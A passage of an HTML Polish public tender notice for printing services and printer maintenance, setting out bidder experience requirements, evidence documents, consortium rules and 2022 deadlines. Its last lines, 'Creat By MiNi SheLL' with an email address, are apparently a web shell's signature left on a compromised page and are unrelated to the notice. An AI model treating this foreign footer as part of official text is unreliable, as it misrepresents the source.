przedmiotem zamówienia, przedmiotowi<br/>bieżącego zamówienia.<br/>Zamawiający rozumie przez to świadczenie polegające na dostawie materiałów eksploatacyjnych wraz z organizacją<br/>wydruku, przy użyciu systemu teleinformatycznego pozwalającego na zarządzanie wydrukiem, a także konserwację<br/>urządzeń drukujących z jednoczesnym umożliwieniem Zamawiającemu korzystanie z urządzeń drukujących udostępnionych<br/>przez Wykonawcę.<br/>Przy czym każda wykazana dostawa musi spełniać następujące uwarunkowania:<br/>wartość kontraktu minimum:<br/>200 000 zł brutto (jeśli dostawa jest nadal wykonywana, to podana wartość odnosi się do już wykonanej części),<br/>okres wykonywania dostawy co najmniej 3 następujących po sobie miesięcy (lub od co najmniej 3 miesięcy)<br/>świadczona na podstawie jednej, odrębnej zawartej umowy / stosunku zobowiązaniowego<br/>wykonana należycie<br/>W przypadku oferty składanej wspólnie przez kilku Wykonawców ubiegających się o udzielenie zamówienia, ocena<br/>wymagań określonych w zakresie spełnienia niniejszego warunku udziału w postępowaniu będzie dokonana łącznie w<br/>stosunku do Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Wykaz dostaw wykonanych, a w przypadku<br/>świadczeń okresowych lub ciągłych również wykonywanych może spełnić i wykazać jeden Wykonawca lub wspólnie. W<br/>przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, łączne spełnianie warunku udziału w<br/>postępowaniu może polegać np. na tym, że jednej Wykonawca wykaże się jedną realizacją dostawy zgodną z wymogami<br/>Zamawiającego, a drugi Podmiot zaś również jedną dostawą zgodną z wymogami Zamawiającego. Nie dopuszcza się<br/>łączenia kilku umów zawartych przez różne podmioty w celu zsumowania ich wartości w celu osiągnięcia poziomu<br/>kwotowego wymaganego przez Zamawiającego <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W przypadku Wykonawcy,<br/>który polega na zdolnościach innych podmiotów, Wykonawca przedstawia wraz z Oświadczeniem, o którym mowa w ust. 2-3, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio<br/>spełnianie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby. – załącznik nr 7 do<br/>SWZ.<br/>Na wezwanie:<br/>W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego,<br/>zwanego dalej „postępowaniem”, zamawiający może żądać następujących podmiotowych środków dowodowych:<br/>1) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnie z załącznikiem nr 9 do SWZ, o których<br/>mowa w:<br/>a) art. 108 ust. 1 pkt 1 ustawy, Pzp<br/>b) art. 108 ust. 1 pkt 2 ustawy, Pzp<br/>c) art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>d) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>e) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>f) art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>g) art. 109 ust. 1 pkt 1 ustawy Pzp, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których<br/>mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz.U. z 2019 r. poz. 1170),<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający żąda złożenia, wraz z ofertą i dokumentami, o których mowa w ust. 1, oświadczenia Wykonawcy, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie wskazanym przez Zamawiającego w SWZ, stanowiącego dowód:<br/>1) potwierdzający brak podstaw wykluczenia i<br/>2) potwierdzający spełnianie warunków udziału w postępowaniu<br/>- na dzień składania ofert tymczasowo zastępujący wymagane przez Zamawiającego środki dowodowe.<br/>Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp Wykonawca składa w formie dokumentu, którego wzór zawiera<br/>Załącznik Nr 3 do SWZ.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z Ofertą, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia<br/>lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów – załącznik nr 7A do SWZ<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. – załącznik nr 8 do SWZ.<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda następujących<br/>dokumentów:<br/>1) wykaz dostaw, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych<br/>są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga złożenia: Formularza składającego się na Ofertę, którego przykładowy<br/>wzór stanowi załącznik nr 2 do SWZ.<br/>Dokumentu potwierdzającego umocowanie do reprezentowania lub pełnomocnictwo do<br/>podpisania Oferty, jeśli osoba bądź osoby podpisujące ofertę działają na podstawie<br/>pełnomocnictwa, o ile umocowanie do dokonania przedmiotowej czynności nie wynika z<br/>Dokumentu potwierdzającego umocowanie do reprezentowania. Zamawiający wymaga złożenia<br/>następujących przedmiotowych środków dowodowych: Zamawiający nie wymaga złożenia<br/>przedmiotowych środków dowodowych. W przypadku gdy dokumenty elektroniczne w<br/>postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, wykonawca,<br/>w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio<br/>oznaczonym pliku Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne<br/>dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem<br/>na język polski. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy (lider<br/>konsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim profilu<br/>Wykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych Wykonawców<br/>wpisując ich dane. Pełnomocnictwo, o którym mowa powyżej, powinno zostać przekazane w<br/>ofercie wspólnej Wykonawców. Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z<br/>Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje,<br/>korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla<br/>wszystkich Wykonawców składających ofertę wspólną. Nie dopuszcza się uczestniczenia<br/>któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia w więcej niż<br/>jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców wspólnie<br/>ubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w ramach<br/>grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wspólnicy spółki<br/>cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. Wypełniając formularz oferty,<br/>jak również inne dokumenty powołujące się na „Wykonawcę” należy wpisać dane dotyczące<br/>wszystkich współpartnerów, a nie ich pełnomocnika – lidera lub jednego ze współpartnerów.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do wniosku o oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy. – załącznik nr 8 do SWZ. W przypadku Wykonawców wspólnie<br/>ubiegających się o zamówienie, Oświadczenie o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, potwierdzające brak<br/>podstaw wykluczenia oraz potwierdzające spełnianie warunków udziału w postępowaniu, w<br/>zakresie w jakim każdy z tych Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu. Pozostałe wymogi zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały wymienione w § 8 projektowanych postanowieniach umownych tj.<br/>załączniku nr 4 do Specyfikacji Warunków Zamówienia. Ze względu na limity znaków nie jest<br/>możliwe ich przeniesienie do ogłoszenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.ms.gov.pl/czs</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca podlega wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com